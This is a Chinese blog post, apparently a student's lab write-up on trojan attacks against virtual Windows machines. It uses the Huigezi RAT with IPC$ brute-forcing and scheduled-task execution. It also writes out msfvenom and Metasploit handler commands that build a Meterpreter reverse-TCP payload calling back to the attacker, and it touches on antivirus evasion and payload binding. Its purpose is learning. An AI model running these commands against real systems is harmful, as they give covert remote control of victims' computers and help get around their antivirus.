木马攻击(灰鸽子和msf)

最新推荐文章于 2023-12-21 23:48:49 发布
最新推荐文章于 2023-12-21 23:48:49 发布
阅读量1.3k 收藏 13
点赞数 7
分类专栏: 木马远 控免杀 文章标签: 木马 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43571759/article/details/105247698
版权

木马攻击

前言

最近在学习木马攻击方面,做了一个思维导图慢慢来学习。

不过凡是还是要从实例开始,对木马进行了大致的了解然后绘制了个脑图之后就要开始动手啦,下面记录一下我的学习过程

在这里插入图片描述

ps:这里可能还需要补充

灰鸽子远程控制

攻击机:Windowsxp

靶机:windows server 2003

1.配置IP

在这里插入图片描述

2.生成木马

在这里插入图片描述

查看是否生成成功:

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
利用ipc$暴力破解

在这里插入图片描述
上传木马并且计划任务运行

在这里插入图片描述

在这里插入图片描述
默默等待主机上线

在这里插入图片描述

然后就可以任意操纵啦,实验完成之后还能帮server 2003关机~~~
在这里插入图片描述

msf生成木马连接我的Windows主机

攻击机:kali
靶机:win10

利用msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.129 LPORT=4444 -f exe >wangzhe.exe

在这里插入图片描述
会在当前路径生成一个wangzhe.exe 然后将其拖到windows下发现会被查杀

这里可以用编码器试一下能否实现免杀,定制编码器针对不同的杀软会有不同的效果;
在这里插入图片描述
这里先不考虑如何绕过安全狗,所以先关掉电脑管家

在这里插入图片描述

使用exploit模块

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options

set LHOST 192.168.11.129

set LPORT 4444

exploit

在这里插入图片描述

执行命令

可以进入shell的环境执行命令,乱码是中文只需要调整终端的编码。

在这里插入图片描述

简单捆绑实现

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

完毕!

humble嘻
关注
  • 7
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于445端口漏洞的入侵测试
qq_50905066的博客
03-19 5583
实验环境 靶机:一台Windows server 2003(IP:192.168.80.200)服务器 攻击者:一台Windows xp主机(IP:192.168.80.205)和一台kali主机(IP:192.168.80.206) 实验原理 (1)445端口的smb服务提供了主机远程访问的服务器的潜在威胁 (2)Windows下共享文件服务开启时,存在隐藏共享文件 (3)Windows server 2003自带telnet功能,存在安全隐患 实验步骤 信息收集 在Windows xp上运行端
远程访问型木马——灰鸽子软件的使用(含免杀)
weixin_50464560的博客
06-02 1万+
远程访问型木马——灰鸽子 先来了解下什么是远程访问型木马: 1.它在受害者主机上运行一个服务端,监听某个特定端口;入侵者则使用木马的客户端连接到该端口上,向服务端发送各种指令,访问受害者计算机资源。 2.使用这类木马,只需有人运行了服务端程序,如果客户知道了服务端的IP地址,就可以实现远程控制。 3.这类程序可以实现观察受害者正在干什么。 再来了解下灰鸽子: 1.自2001年,灰鸽子诞生之日起,就被反病毒专业人士判定为最具危险性的后门程序,并引发了安全领域的高度关注。2004年、2005年、2006年,灰鸽
灰鸽子--木马、后门实验
mr__sheng的博客
05-28 2868
目录 实验目的 实验要求 实验原理 实验环境 实验步骤 实验目的 1.了解木马攻击的原理。 2. 掌握木马与后门工作机制 3. 掌握木马与后门的防范措施 实验要求 利用灰鸽子客户端配置服务器程序并生成服务端 配置并生成服务器 进行木马植入,通过灰鸽子客户端界面进行远程连接 实验原理 一个完整的特洛伊木马套装程序含了两部分:服务端(服务器部分)和客户端(控制器部分)。植入对方电脑的是服务端,而黑客正是利用客户端进入运行了服...
恶意软件样本行为分析——灰鸽子和大白鲨
最新发布
weixin_49816179的博客
12-21 1503
进行了灰鸽子木马制作和行为分析,并用相似方法对大白鲨木马也进行了探究。
渗透测试-灰鸽子远控木马
热门推荐
道阻且长,行则将至。
02-15 1万+
木马概述 灰鸽子( Huigezi),原本该软件适用于公司和家庭管理,其功能十分强大,不但能监视摄像头、键盘记录、监控桌面、文件操作等。还提供了黑客专用功能,如:伪装系统图标、随意更换启动项名称和表述、随意更换端口、运行后自删除、毫无提示安装等,并采用反弹链接这种缺陷设计,使得使用者拥有最高权限,一经破解即无法控制。最终导致被黑客恶意使用。原作者的灰鸽子被定义为是一款集多种控制方式于一体的木马程序...
msf攻击Mysql服务.docx
04-26
在网络安全领域,Metasploit Framework(MSF)是一个广泛使用的开源工具,它提供了各种模块来探测、攻击和利用系统漏洞。针对MySQL服务器的攻击是其中的一种常见场景,因为MySQL作为全球最流行的开源数据库管理系统...
msf攻击FTP 服务.docx
04-26
通过图文并茂的方式详细描述了利用msf框架进行ftp攻击的过程,文中包含了命令和步骤,很详细,给初学者作为参考。
Msf攻击Win7
07-09
对于Win7,如果发现高危漏洞,可以进一步研究是否已有公开的Exploit(利用代码)和攻击方法,以提高渗透测试的效率。 在进行Msf攻击Win7时,选择合适的exploit模块至关重要。Metasploit框架会提供与Win7系统和已知...
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
msf5 自动攻击模块 db_autopwn
07-10
**msf5 自动攻击模块 db_autopwn 知识点详解** `db_autopwn`是Metasploit Framework(msf5)中的一个核心功能模块,它允许渗透测试者进行自动化漏洞利用,大大提高了效率。这个模块在安全审计和渗透测试过程中扮演...
为什么不要随便点击下载链接:过时的远程病毒灰鸽子木马示范
来到了学渣的博客
02-11 3962
实验环境: 2003系统靶机 ip:192.168.10.128 2007黑客攻击灰鸽子软件 要说的话 1.灰鸽子木马是很古老的木马,早已经列入检测的范围内,即使关闭了杀软、防火墙,生成的exe病毒还是会被干掉。所以所有的步骤,最好都以虚拟机作为实验环境。 2.为什么不要随便点击下载链接,因为下载内容里边很可能会携带一些木马病毒程序,一但下载,很可能会自动运行、并且受害者电脑毫无变化,但是攻...
Kali Linux渗透测试 135 免杀简介
kevinhanser
04-13 3721
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 恶意软件 病毒、木马、蠕虫、键盘激励、僵尸程序、流氓软件、勒索软件、广告程序 在用户非自愿的情况下执行安装 处于某种恶意的目的:控制、窃取、勒索、偷窥、推送、攻击…… 2. 防病毒软件 恶意程序最主要
【免杀测试】Kali之Metasploit几款工具免杀练习
朔方飞絮谈安全
01-11 1万+
余磊  不知攻,焉知防。作为渗透测试攻城狮,实战之前要做大量的攻防练习。一般黑客拿到主机的shell之后,需要留后门方便进行下一步的渗透。普通的木马已经很容易被查杀工具识别,这时就催生出了免杀技术来绕过杀毒软件。 下面就尝试测试有关工具的免杀效果,三款工具为,shellter,Veil,  Avet 01 shellter Shellter采用了动
Kali Meterpreter远程控制方式
董哥的黑板报
06-24 4879
一、概念 当我们在进行远程控制时,主控端开启监听,并且被控端打开远程控制软件,该软件为远程控制方式为Meterpreter类型。则我们在主控端就可以使用Meterpreter来控制被控端 Meterpreter类似于shell 特点:当我们控制多个远程时,则每个连接进来的设备在Meterpreter中都是一个会话,用sessions id表示 meterpreter就是一个被控端程序。me...
4.2 木马攻防实验
qq_55202378的博客
07-27 1434
木马攻防
灰鸽子木马的原理和清除方法
魔拉宝
07-24 7108
 灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。连接密码的设定使得灰鸽子服务端程序只能被配置它的黑客控制,避免了黑客之间的竞争。服务端对客户端连接方式有多种,使得处于各种网络环境的用户都
灰鸽子”网页木马从原理、制作到防范
[木子]的专栏
08-18 2723
如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎 么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一 些不怀好意者精心制作的网页木马。  以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMV
kali生产木马病毒msf
09-08
在Kali中,可以使用Msfvenom工具生成木马病毒文件。首先,在Kali中运行Msfvenom命令,生成木马文件。然后,在同一局域网内的Windows 10主机上,使用浏览器访问生成的木马文件进行下载。然而,根据引用中的描述,Windows 10主机上的火绒安全软件会自动识别该木马并将其移除至病毒隔离区。你可以手动将木马文件从病毒隔离区移出,并上传至腾讯哈勃分析系统进行在线病毒识别分析。根据引用中的描述,腾讯哈勃分析系统将该木马识别为"轻度风险"。另外,你还可以使用火绒安全软件对木马文件进行杀毒扫描,以获取更多的扫描分析结果。然而,单纯依靠单一的病毒引擎进行识别可能不太可靠,因此可以使用VirusTotal这个在线的多引擎病毒识别工具。引用中提到,VirusTotal通过多种反病毒引擎对上传的文件进行检测,以判断文件是否被病毒、蠕虫、木马以及各类恶意软件感染。这样可以大大减少杀毒软件误杀或未检出病毒的几率,并且其检测率优于使用单一产品。所以,在Kali中生成的木马病毒文件可以通过VirusTotal进行检测,以获取更准确的检测结果。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值